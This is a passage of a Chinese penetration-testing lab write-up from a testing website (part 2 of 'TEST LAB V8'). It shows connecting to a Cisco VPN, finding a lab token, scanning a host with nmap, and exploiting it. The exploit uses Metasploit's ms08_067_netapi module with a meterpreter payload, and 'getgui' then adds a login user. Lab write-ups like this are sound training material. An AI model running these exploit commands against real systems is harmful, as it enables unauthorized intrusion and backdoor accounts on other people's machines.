TEST LAB V8(2):Cisco设备和Terminal系统

发表于:2016-6-01 09:44

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:confucius_01    来源:51Testing软件测试网原创

分享:
  我们尝试使用vpnc连接,如下图所示,成功连上了Cisco设备。
  为了确认是否可以连接互联网,我们ping谷歌,ping不通。但是当尝试ping谷歌的IP时得到了响应。
  这好像是DNS解析的问题,因此打开了/etc/resolv.conf来寻找问题,我们在那儿找到了Token。
  攻击TERMINAL:
  我们现在可以连上VPN了,所以可以攻击在另一个网络中的机器TERMINAL。在运行工具之前,我们需要确认自己已经连上了Cisco VPN,使用nmap进行端口扫描,命令如下:
  nmap -sS -sV -Pn -A 192.168.0.2
  通过查看端口,这个系统好像有著名的netapi漏洞。445端口开放,运行着samba服务,这很容易被远程攻击。我们在Metasploit上执行下面命令:
  use exploit/windows/smb/ms08_067_netapi
  set payload windows/meterpreter/bind_tcp
  set RHOST 192.168.0.2
  exploit
  漏洞利用很顺利,现在我们有了一个meterpreter会话。我们使用一个post漏洞利用模块,它会在系统上增加一个用户,命令如下:
  run getgui -u test -p test
  现在我们可以使用test/test登录Terminal系统了。
32/3<123>
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号